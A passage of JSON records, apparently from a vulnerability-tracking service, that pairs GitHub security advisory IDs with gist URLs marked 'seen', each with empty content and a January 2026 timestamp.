"creation_timestamp": "2026-01-24T21:23:21.000000Z"}, {"uuid": "ab95b6a4-3ff4-443e-90cc-1c1d66212e60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cv54-7wv7-qxcw", "type": "seen", "source": "https://gist.github.com/alon710/315285e1dbcb26134e8af9d7883ff7da", "content": "", "creation_timestamp": "2026-01-24T21:23:20.000000Z"}, {"uuid": "e4af7db8-5c6a-4248-aa2c-60d5f84a0bbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-94c7-g2fj-7682", "type": "seen", "source": "https://gist.github.com/alon710/bad197ef30faed7c7766bf7208bc5e24", "content": "", "creation_timestamp": "2026-01-24T21:23:19.000000Z"}, {"uuid": "2e33bde3-408b-41a4-ba8b-a8f3507da617", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44jg-mv3h-wj6g", "type": "seen", "source": "https://gist.github.com/alon710/cb1843d2e4ad9145bc6956f3c0ebc6dd", "content": "", "creation_timestamp": "2026-01-24T21:24:30.000000Z"}, {"uuid": "c938d999-6d3c-47f7-b602-96fd4981c256", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-339m-4qw5-j2g3", "type": "seen", "source": "https://gist.github.com/alon710/4972d5a3d088ec92b983ffaa97796d26", "content": "", "creation_timestamp": "2026-01-24T21:23:13.000000Z"}, {"uuid": "99401c5a-d1a2-4248-a1ae-2c2a81743870", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4hjh-wcwx-xvwj", "type": "seen", "source": "https://gist.github.com/alon710/b1b896846adeaa4e8210fc339bc155ca", "content": "", "creation_timestamp": "2026-01-24T21:24:21.000000Z"}, {"uuid": "55fbf6b7-1871-4ca9-86a8-7532107c441e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5vx3-wx4q-6cj8", "type": "seen", "source": "https://gist.github.com/alon710/6222f7b3da2b63e2c6f2b9defb0cf281", "content": "", "creation_timestamp": "2026-01-24T21:23:33.000000Z"}, {"uuid": "7fe67454-ee1e-4194-888d-473e64b379e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qvr7-7g55-69xj", "type": "seen", "source": "https://gist.github.com/alon710/642ee88b28bbc94528a7e7d1b9ae5448", "content": "", "creation_timestamp": "2026-01-24T21:24:59.000000Z"}, {"uuid": "7963121e-347d-4d6e-b477-e9c9e08881ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3HW-29FV-2X75", "type": "seen", "source": "https://gist.github.com/alon710/db2e68af548133defadbd41630f857d6", "content": "", "creation_timestamp": "2026-01-24T21:23:12.000000Z"}, {"uuid": "f2a9e2cc-0f63-4fd1-b734-6dca1a2c3388", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hpwg-xg7m-3p6m", "type": "seen", "source": "https://gist.github.com/alon710/91521cc5d46c08c88e76d31982727895", "content": "", "creation_timestamp": "2026-01-24T21:23:09.000000Z"}, {"uuid": "e8567500-c3fc-4416-81c6-174a88753671", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4w8-49pv-mf72", "type": "seen", "source": "https://gist.github.com/alon710/bdca51eb2075916d24a0fe7b456c33c6", "content": "", "creation_timestamp": "2026-01-24T21:23:41.000000Z"}, {"uuid": "3e148a36-53f6-4542-ab9e-a0d1c98849dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gfpw-jgvr-cw4j", "type": "seen", "source": "https://gist.github.com/alon710/6cb56ce49fdd250735cd1e3f48481606", "content": "", "creation_timestamp": "2026-01-24T21:23:38.000000Z"}, {"uuid": "19513a63-ef59-4222-94f2-b830e0065393", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2657-3c98-63jq", "type": "seen", "source": "https://gist.github.com/alon710/20ae0d4dc819a420296799e1cfa3f715", "content": "", "creation_timestamp": "2026-01-24T21:23:34.000000Z"}, {"uuid": "9c92e7f9-021f-47f5-99eb-3083e7621fb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f82v-jwr5-mffw", "type": "seen", "source": "https://gist.github.com/alon710/269acc1fe598702f002e03ddebce0469", "content": "", "creation_timestamp": "2026-01-24T21:25:47.000000Z"}, {"uuid": "19aa7442-9713-4041-bfa6-6d7e5f5a261d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95c6-p277-p87g", "type": "seen", "source": "https://gist.github.com/alon710/a2926998ce57c9024043f9a09fd523b0", "content": "", "creation_timestamp": "2026-01-24T21:23:06.000000Z"}, {"uuid": "db61bd80-75de-428f-a51a-acfc12702efa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6pmj-xjxp-p8g9", "type": "seen", "source": "https://gist.github.com/alon710/8c70e7f988a1a227e1f9723ebe8d32bd", "content": "", "creation_timestamp": "2026-01-24T21:23:05.000000Z"}, {"uuid": "e5aa2125-9191-4b01-bc25-ded1c7c75721", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pchf-49fh-w34r", "type": "seen", "source": "https://gist.github.com/alon710/5ba593410f73d7efe2ec83cbf0b0474b", "content": "", "creation_timestamp": "2026-01-24T21:23:03.000000Z"}, {"uuid": "8476ea0a-54a8-4ad5-b598-d48613c3eb86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5882-5RX9-XGXP", "type": "seen", "source": "https://gist.github.com/alon710/7c3cf33f4074ed4c36e7b3bd1aee2022", "content": "", "creation_timestamp": "2026-01-24T21:24:01.000000Z"}, {"uuid": "4077c62a-17c4-48bb-8d1e-9b090deebfc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jm66-cg57-jjv5", "type": "seen", "source": "https://gist.github.com/alon710/3729dc04c9b6c67fd150f39e1e1ab30e", "content": "", "creation_timestamp": "2026-01-24T21:25:16.000000Z"}, {"uuid": "b73f75db-f1a1-44e9-b5de-5c1e7d16aa07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xxjr-mmjv-4gpg", "type": "seen", "source": "https://gist.github.com/alon710/cfc832b7508314e93b17da0532cc5a18", "content": "", "creation_timestamp": "2026-01-24T21:23:02.000000Z"}, {"uuid": "2429fa85-bde4-4036-96b6-efbf1dc2564d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R92C-9C7F-3PJ8", "type": "seen", "source": "https://gist.github.com/alon710/61e4e9bc0a22eb1440a02ce8f5f94cbf", "content": "", "creation_timestamp": "2026-01-24T21:23:01.000000Z"}, {"uuid": "afe9f472-5681-4961-9d51-638911f5ac32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q2x5-4xjx-c6p9", "type": "seen", "source": "https://gist.github.com/alon710/dcd3cb019a3aa9fac521a1c167378738", "content": "", "creation_timestamp": "2026-01-24T21:23:00.000000Z"}, {"uuid": "c5ce8d16-d850-4444-abfa-139882e76ad8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2p49-45hj-7mc9", "type": "seen", "source": "https://gist.github.com/alon710/4b217fe2cf8ffb61c81cdbc3ae7afb81", "content": "", "creation_timestamp": "2026-01-24T21:22:59.000000Z"}, {"uuid": "52a40258-5c1a-411c-9023-f9de15cd81bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rq6q-wr2q-7pgp", "type": "seen", "source": "https://gist.github.com/alon710/95646488f16d926a9285cc4a529b9663", "content": "", "creation_timestamp": "2026-01-24T21:22:58.000000Z"}, {"uuid": "09c165fa-8a46-4413-842c-dfa48cd10fe6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4xh5-jcj2-ch8q", "type": "seen", "source": "https://gist.github.com/alon710/a8f00d02af9bbef05b5cf8f64b7e8a02", "content": "", "creation_timestamp": "2026-01-24T21:22:57.000000Z"}, {"uuid": "f4256120-9784-46d7-9d23-d56a3f382116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58Q2-9X27-H2JM", "type": "seen", "source": "https://gist.github.com/alon710/30d91ed770e12ad39433144e9f4936d7", "content": "", "creation_timestamp": "2026-01-24T21:24:22.000000Z"}, {"uuid": "fe9ef210-4f11-4e36-b806-f653220f10f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4fqp-r85r-hxqh", "type": "seen", "source": "https://gist.github.com/alon710/3f67d5416c0d4f1e17b0e57daa874634", "content": "", "creation_timestamp": "2026-01-24T21:22:55.000000Z"}, {"uuid": "aef4db8d-3d95-4470-86c8-1f69ac43e268", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v364-rw7m-3263", "type": "seen", "source": "https://gist.github.com/alon710/cfae8ade2fdc202b145c9ad57e0cb0f2", "content": "", "creation_timestamp": "2026-01-24T22:42:28.000000Z"}, {"uuid": "0fb8e150-828b-45a1-9468-f6f75e81198c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8v65-47jx-7mfr", "type": "seen", "source": "https://gist.github.com/alon710/fd276d4bca0a40e4d92c87b2d322b30f", "content": "", "creation_timestamp": "2026-01-24T22:42:27.000000Z"}, {"uuid": "8c407eca-21cb-456c-8c87-6e1c1e3d6973", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5379-f5hf-w38v", "type": "seen", "source": "https://gist.github.com/alon710/d80cc4fdfcff3f5ee2603b3d12e1e4a9", "content": "", "creation_timestamp": "2026-01-24T22:29:21.000000Z"}, {"uuid": "18c9f4af-aa72-46d8-8fc9-bb2b99aae21d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcjq-j3mq-jv5j", "type": "seen", "source": "https://gist.github.com/alon710/05f57315425e9391f1dcd6e418477cd9", "content": "", "creation_timestamp": "2026-01-24T22:29:18.000000Z"}, {"uuid": "a3adf9da-3b36-4078-9ebb-96906504763d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pcjq-j3mq-jv5j", "type": "seen", "source": "https://gist.github.com/alon710/3d5d0c96ccc38609421b09991e8fdc78", "content": "", "creation_timestamp": "2026-01-24T22:29:15.000000Z"}, {"uuid": "c2d4ea47-b4ad-461c-aeea-ecdbac366115", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qq5-rm4j-mr97", "type": "seen", "source": "https://gist.github.com/alon710/7a431305d45653dbeb04a14f63240576", "content": "", "creation_timestamp": "2026-01-24T22:29:06.000000Z"}, {"uuid": "71e3da0b-dae2-445e-8ee2-bd5e027b0f89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8qq5-rm4j-mr97", "type": "seen", "source": "https://gist.github.com/alon710/9572c297cc7a279bc75634b878787c4a", "content": "", "creation_timestamp": "2026-01-24T22:29:04.000000Z"}, {"uuid": "334d4276-cb87-4060-a2eb-aee04d2116c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-232v-j27c-5pp6", "type": "seen", "source": "https://gist.github.com/alon710/823a3bbfcca3d099b34e9d463edcf770", "content": "", "creation_timestamp": "2026-01-24T22:29:01.000000Z"}, {"uuid": "24e45ce1-c51d-4fb4-99b3-d38bdc3177c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-232v-j27c-5pp6", "type": "seen", "source": "https://gist.github.com/alon710/e88d8d0be10139f637b6f94a8ceb8766", "content": "", "creation_timestamp": "2026-01-24T22:28:58.000000Z"}, {"uuid": "d032d6a8-4628-40eb-937c-06ea75f353bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g7f-ff96-5gcw", "type": "seen", "source": "https://gist.github.com/alon710/5e694363b414288a55304335206db682", "content": "", "creation_timestamp": "2026-01-24T22:28:55.000000Z"}, {"uuid": "6d92415f-42a9-4437-bdce-29f502b51bd6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-44jg-mv3h-wj6g", "type": "seen", "source": "https://gist.github.com/alon710/dcf37c30859ea3d4a2aa8bcebb05efea", "content": "", "creation_timestamp": "2026-01-24T22:31:17.000000Z"}, {"uuid": "a1fe720f-17a3-4e98-ae06-8b861d4bf99f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-54v4-4685-vwrj", "type": "seen", "source": "https://gist.github.com/alon710/1b45129198c5c3d4ee728499baa6e753", "content": "", "creation_timestamp": "2026-01-24T22:30:04.000000Z"}, {"uuid": "176595bd-9243-4a36-8a4a-ee326cdd8cda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-m3c4-prhw-mrx6", "type": "seen", "source": "https://gist.github.com/alon710/e91ff44d8d4c213e4bd436087aa275f3", "content": "", "creation_timestamp": "2026-01-24T22:29:41.000000Z"}, {"uuid": "89c63d9d-a8d5-4fc9-ac67-f3964c4bf056", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWR8-XRPW-9QF5", "type": "seen", "source": "https://gist.github.com/alon710/59e228bfc63cd66f728f971d04c33fa8", "content": "", "creation_timestamp": "2026-01-24T22:31:46.000000Z"}, {"uuid": "fcb24dd1-df51-4e43-ade8-3aaa8b678d75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38CW-85XC-XR9X", "type": "seen", "source": "https://gist.github.com/alon710/1527fab64ffc030509239cdd3963949f", "content": "", "creation_timestamp": "2026-01-24T22:28:43.000000Z"}, {"uuid": "5a900b54-a5fd-4fbd-add0-ea33aa9d5da0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38CW-85XC-XR9X", "type": "seen", "source": "https://gist.github.com/alon710/9f4e4f537666a69551cc6e9aa3f3cb90", "content": "", "creation_timestamp": "2026-01-24T22:28:41.000000Z"}, {"uuid": "056381c0-84c0-4c25-a48b-2d5b52816e5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5882-5RX9-XGXP", "type": "seen", "source": "https://gist.github.com/alon710/eecfdab8a8012c49a6fb6cf308bd7e65", "content": "", "creation_timestamp": "2026-01-24T22:28:37.000000Z"}, {"uuid": "96cdf82f-4abf-4669-bd1f-071595e38dc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5882-5RX9-XGXP", "type": "seen", "source": "https://gist.github.com/alon710/c1d4c9744a45b33856570a91b01623ec", "content": "", "creation_timestamp": "2026-01-24T22:28:35.000000Z"}, {"uuid": "b02e3a81-649c-4101-bec7-f10e1fe0c397", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cc8m-98fm-rc9g", "type": "seen", "source": "https://gist.github.com/alon710/b20e1ab3ca8e6c9fdd572d1ca094b859", "content": "", "creation_timestamp": "2026-01-24T22:28:32.000000Z"}, {"uuid": "2da604f1-d3d5-41d6-a23d-cbd67cbffb66", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cc8m-98fm-rc9g", "type": "seen", "source": "https://gist.github.com/alon710/31a8dfbbb13cd86cf2b3be44e6506ee1", "content": "", "creation_timestamp": "2026-01-24T22:28:29.000000Z"}, {"uuid": "cac55877-d28a-47f5-ad00-3581febe0e02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw32-9rmw-qwww", "type": "seen", "source": "https://gist.github.com/alon710/c629833d5c96246c86d76f8656466478", "content": "", "creation_timestamp": "2026-01-24T22:28:26.000000Z"}, {"uuid": "2a9bf1d8-77f1-4c61-bbe1-b9bc6e3d727f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gw32-9rmw-qwww", "type": "seen", "source": "https://gist.github.com/alon710/11c241cd683793b5879fa7d9e81816ea", "content": "", "creation_timestamp": "2026-01-24T22:28:23.000000Z"}, {"uuid": "cf24336c-1940-4a7d-b0ce-8e071fdcc116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vx9w-5cx4-9796", "type": "seen", "source": "https://gist.github.com/alon710/405298afc93a5f4c028781f29065156c", "content": "", "creation_timestamp": "2026-01-24T22:28:20.000000Z"}, {"uuid": "34a23f81-8304-4ab1-b7a0-5400e10003bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vx9w-5cx4-9796", "type": "seen", "source": "https://gist.github.com/alon710/ac23749e1a798f2eeb4a4ba17e91df0a", "content": "", "creation_timestamp": "2026-01-24T22:28:17.000000Z"}, {"uuid": "a95849fb-1022-47fb-bcdf-e62573f02ec5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mpwp-4h2m-765c", "type": "seen", "source": "https://gist.github.com/alon710/f6609ee875b4dc2375856bf34fb48e3d", "content": "", "creation_timestamp": "2026-01-24T22:28:14.000000Z"}, {"uuid": "de40f658-4bff-4cf5-94b2-4fc8dca3be65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mpwp-4h2m-765c", "type": "seen", "source": "https://gist.github.com/alon710/5e9eac38e21c6d299dfef188596a93eb", "content": "", "creation_timestamp": "2026-01-24T22:28:11.000000Z"}, {"uuid": "642d6031-5f0e-48e8-9e28-709b38c3d589", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5QW5-WF2Q-F538", "type": "seen", "source": "https://gist.github.com/alon710/8119c985ef4c41f1a2ff553c3f53fd6a", "content": "", "creation_timestamp": "2026-01-24T22:28:08.000000Z"}, {"uuid": "03525b58-ef2a-4587-88c4-b51dbbd2ea6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g2pg-6438-jwpf", "type": "seen", "source": "https://gist.github.com/alon710/f1fa480b3470e9e2c0be2978bf81a55f", "content": "", "creation_timestamp": "2026-01-24T22:31:14.000000Z"}, {"uuid": "8167fa99-7023-4f89-b688-998e564a7670", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g2pg-6438-jwpf", "type": "seen", "source": "https://gist.github.com/alon710/65f0632454e6232028eda330cc8e1ed5", "content": "", "creation_timestamp": "2026-01-24T22:31:12.000000Z"}, {"uuid": "b2bec077-ec1c-4650-948c-84174d81ca47", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6738-r8g5-qwp3", "type": "seen", "source": "https://gist.github.com/alon710/e871d8629b5201242ce706c2910147e1", "content": "", "creation_timestamp": "2026-01-24T22:30:42.000000Z"}, {"uuid": "d2579db3-c815-48df-a94a-fbab3cd128fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H66J-XM43-47PP", "type": "seen", "source": "https://gist.github.com/alon710/d6f2f2002acc9d6ee229a002c56af61b", "content": "", "creation_timestamp": "2026-01-24T22:29:52.000000Z"}, {"uuid": "8078ccf0-87f0-4a3b-b17b-bf8956bb5270", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-595p-g7xc-c333", "type": "seen", "source": "https://gist.github.com/alon710/326469d4f9cfa4992acbdcd6440a5084", "content": "", "creation_timestamp": "2026-01-24T22:34:23.000000Z"}, {"uuid": "d2257542-3ef6-45fb-8bca-e9edb892a06a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cphf-4846-3xx9", "type": "seen", "source": "https://gist.github.com/alon710/6493c571946d054a03f11a09e6376ca6", "content": "", "creation_timestamp": "2026-01-24T22:31:04.000000Z"}, {"uuid": "3399a74c-5bbb-4064-a1c7-db22fc73e564", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cphf-4846-3xx9", "type": "seen", "source": "https://gist.github.com/alon710/cdd5a9aa7fb1db7b46aa3da1f28ac3c9", "content": "", "creation_timestamp": "2026-01-24T22:31:01.000000Z"}, {"uuid": "1b1df2c7-84fc-46d8-b34f-22ccf532b11b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cphf-4846-3xx9", "type": "seen", "source": "https://gist.github.com/alon710/0990836f0e95efe970578976c53eb183", "content": "", "creation_timestamp": "2026-01-24T22:30:58.000000Z"}, {"uuid": "e4a7f03a-53f6-42dc-a55e-e05174587bda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W54X-R83C-X79Q", "type": "seen", "source": "https://gist.github.com/alon710/75cec7e2879df57da85e0db787a09eb4", "content": "", "creation_timestamp": "2026-01-24T22:30:53.000000Z"}, {"uuid": "f79921c0-3d90-48d8-980b-ea83f600286d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cphf-4846-3xx9", "type": "seen", "source": "https://gist.github.com/alon710/a0444330b8b18e01bcd1d36bc2783bd6", "content": "", "creation_timestamp": "2026-01-24T22:30:55.000000Z"}, {"uuid": "d76b8397-b878-48dc-81b7-c1369dc2ab0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W54X-R83C-X79Q", "type": "seen", "source": "https://gist.github.com/alon710/986f077c1b1874eb6f6f19a29e777a2a", "content": "", "creation_timestamp": "2026-01-24T22:30:50.000000Z"}, {"uuid": "932e0738-36a6-481d-b3d9-82724df08a99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W54X-R83C-X79Q", "type": "seen", "source": "https://gist.github.com/alon710/169756d99a00eb8e5018c72edf8ca5cc", "content": "", "creation_timestamp": "2026-01-24T22:30:48.000000Z"}, {"uuid": "41964b70-ea8f-4506-9982-0bcaa8df2c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W54X-R83C-X79Q", "type": "seen", "source": "https://gist.github.com/alon710/13dd9d60ee0160193bb2c9b729f02b95", "content": "", "creation_timestamp": "2026-01-24T22:30:45.000000Z"}, {"uuid": "a8ba3c50-7507-4550-b511-a2e8ef895d58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6738-r8g5-qwp3", "type": "seen", "source": "https://gist.github.com/alon710/4b1f51504bbfbab13949e1d3e93e41a9", "content": "", "creation_timestamp": "2026-01-24T22:30:39.000000Z"}, {"uuid": "7eeb5f4f-0b7d-42ae-917d-23d1f3670ed6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58Q2-9X27-H2JM", "type": "seen", "source": "https://gist.github.com/alon710/255b7346efa1bc94037575fd2fe5b88b", "content": "", "creation_timestamp": "2026-01-24T22:30:26.000000Z"}, {"uuid": "f3e77dfa-2a55-4fca-998a-1d8a694dd367", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58Q2-9X27-H2JM", "type": "seen", "source": "https://gist.github.com/alon710/904a9291e88bae6eae2afb05e7b45bf2", "content": "", "creation_timestamp": "2026-01-24T22:30:23.000000Z"}, {"uuid": "eb2f52d8-248b-4661-aa06-8a978adda878", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58Q2-9X27-H2JM", "type": "seen", "source": "https://gist.github.com/alon710/ddc231f142bf6570adc7e4f337ab7e00", "content": "", "creation_timestamp": "2026-01-24T22:30:21.000000Z"}, {"uuid": "54471c06-2f12-47eb-a159-b884d0df85c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 